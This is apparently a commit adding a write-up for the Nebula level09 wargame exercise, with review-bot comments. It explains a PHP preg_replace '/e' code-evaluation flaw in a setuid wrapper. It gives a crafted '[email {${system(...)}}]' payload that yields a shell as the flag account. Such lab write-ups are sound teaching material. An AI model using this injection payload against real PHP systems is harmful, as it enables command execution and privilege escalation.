Commit d50f607

Richard Luby <richluby@gmail.com>
2016-09-29 09:47:47
added solution for level09
solution uses a SETUID file in the flag09 home folder and a vulnerability in 'preg_replace' that permits evaluating strings as PHP commands
1 parent 911dacc
Changed files (1)
exploit_exercises/nebula/level09/readme.md
@@ -1,18 +1,22 @@
 
-----------------------------------------------
+# Nebula - Level09 - Vulnerable SETUID
 
-About
-Source code
-There’s a C setuid wrapper for some vulnerable PHP code…
-To do this level, log in as the level09 account with the password
-level09. Files for this level can be found in /home/flag09.
+## About
+
+There’s a C setuid wrapper for some vulnerable PHP code.
+To do this level, log in as the `level09` account with the password
+`level09`. Files for this level can be found in ``/home/flag09`.
+
+## Source code
+
+```
 <?php
 
 function spam($email)
 {
   $email = preg_replace("/\./", " dot ", $email);
   $email = preg_replace("/@/", " AT ", $email);
-  
+
   return $email;
 }
 
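Review bot: the About paragraph has a stray double backtick in ``/home/flag09` which will render a literal backtick before the path; it should read `/home/flag09`. The fence opened just before `<?php` is untagged; tagging it ```php gives the source listing syntax highlighting and makes it clear the block is the original script, not shell output.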
@@ -32,3 +36,14 @@ $output = markup($argv[1], $argv[2]);
 print $output;
 
 ?>
+```
+
+## Solution
+
+The line `$contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);` contains a
+vulnerability in the expression `"/(\[email (.*)\])/e"`. The `/e` is an argument that allows the
+second expression to execute [[1](http://www.madirish.net/402)]. Use PHP
+[complex curly syntax](http://stackoverflow.com/a/2596838)
+with a system call in a specially crafted file to gain a shell.  
+Use `echo [email {${system($use_me)}}] > <file name>`, and then execute the program with
+`/home/flag09/flag09 <path to file> /bin/bash`.
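Review bot: the Solution section identifies the `/e` modifier as the flaw but says nothing about the fix; add a sentence that `/e` (evaluate the replacement string as PHP code) was deprecated in PHP 5.5 and removed in PHP 7, and that the same rewrite is done safely with `preg_replace_callback` and a callback that calls `spam()` on the captured group, so no attacker-supplied text is ever evaluated. The instructions also depend on `$use_me` being in scope when the replacement is evaluated, yet the only script lines reproduced in this hunk are the `spam()` function and the `markup($argv[1], $argv[2])` call; quote the line that assigns `$use_me` (presumably from the second argument, given that `/bin/bash` is passed there) so the reader can see why that argument is the one evaluated. Minor: the line ending in `shell.  ` relies on two trailing spaces for a markdown line break, which editors tend to strip; a blank line between the two sentences is more robust.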